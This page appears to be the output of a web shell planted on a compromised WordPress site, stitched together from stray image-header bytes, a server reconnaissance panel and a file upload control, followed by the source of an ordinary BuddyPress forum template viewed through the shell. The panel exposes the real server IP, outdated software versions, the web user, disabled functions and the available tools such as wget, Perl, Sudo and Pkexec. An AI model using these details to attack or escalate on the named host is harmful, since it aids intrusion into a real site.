????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.116 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/wp-content/themes/x/buddypress/forums/ |
Upload File : |
<?php /** * BuddyPress - Forums Loop * * Querystring is set via AJAX in _inc/ajax.php - bp_legacy_theme_object_filter() * * @package BuddyPress * @subpackage bp-legacy */ ?> <?php do_action( 'bp_before_forums_loop' ); ?> <?php if ( bp_has_forum_topics( bp_ajax_querystring( 'forums' ) ) ) : ?> <?php do_action( 'bp_before_directory_forums_list' ); ?> <table class="forum"> <thead> <tr> <th id="th-title"><?php _e( 'Topic', '__x__' ); ?></th> <th id="th-postcount"><?php _e( 'Posts', '__x__' ); ?></th> <th id="th-freshness"><?php _e( 'Freshness', '__x__' ); ?></th> <?php do_action( 'bp_directory_forums_extra_cell_head' ); ?> </tr> </thead> <tbody> <?php while ( bp_forum_topics() ) : bp_the_forum_topic(); ?> <tr class="<?php bp_the_topic_css_class(); ?>"> <td class="td-title"> <a class="topic-title" href="<?php bp_the_topic_permalink(); ?>" title="<?php esc_attr_e( 'Permanent link to this post', '__x__' ); ?>"> <?php bp_the_topic_title(); ?> </a> <p class="topic-meta"> <span class="topic-by"><?php /* translators: "started by [poster] in [forum]" */ printf( __( 'Started by %1$s', '__x__' ), bp_get_the_topic_poster_avatar( 'height=20&width=20') . bp_get_the_topic_poster_name() ); ?></span> <?php if ( !bp_is_group_forum() ) : ?> <span class="topic-in"> <?php $topic_in = '<a href="' . bp_get_the_topic_object_permalink() . '">' . bp_get_the_topic_object_avatar( 'type=thumb&width=20&height=20' ) . '</a>' . '<a href="' . bp_get_the_topic_object_permalink() . '" title="' . bp_get_the_topic_object_name() . '">' . bp_get_the_topic_object_name() .'</a>'; /* translators: "started by [poster] in [forum]" */ printf( __( 'in %1$s', '__x__' ), $topic_in ); ?> </span> <?php endif; ?> </p> </td> <td class="td-postcount"> <?php bp_the_topic_total_posts(); ?> </td> <td class="td-freshness"> <span class="time-since"><?php bp_the_topic_time_since_last_post(); ?></span> <p class="topic-meta"> <span class="freshness-author"> <a href="<?php bp_the_topic_permalink(); ?>"><?php bp_the_topic_last_poster_avatar( 'type=thumb&width=20&height=20' ); ?></a> <?php bp_the_topic_last_poster_name(); ?> </span> </p> </td> <?php do_action( 'bp_directory_forums_extra_cell' ); ?> </tr> <?php do_action( 'bp_directory_forums_extra_row' ); ?> <?php endwhile; ?> </tbody> </table> <?php do_action( 'bp_after_directory_forums_list' ); ?> <div id="pag-bottom" class="x-pagination pagination"> <div class="pagination-links" id="topic-pag-bottom"> <?php bp_forum_pagination(); ?> </div> </div> <?php else: ?> <div id="message" class="info"> <p><?php _e( 'Sorry, there were no forum topics found.', '__x__' ); ?></p> </div> <?php endif; ?> <?php do_action( 'bp_after_forums_loop' ); ?>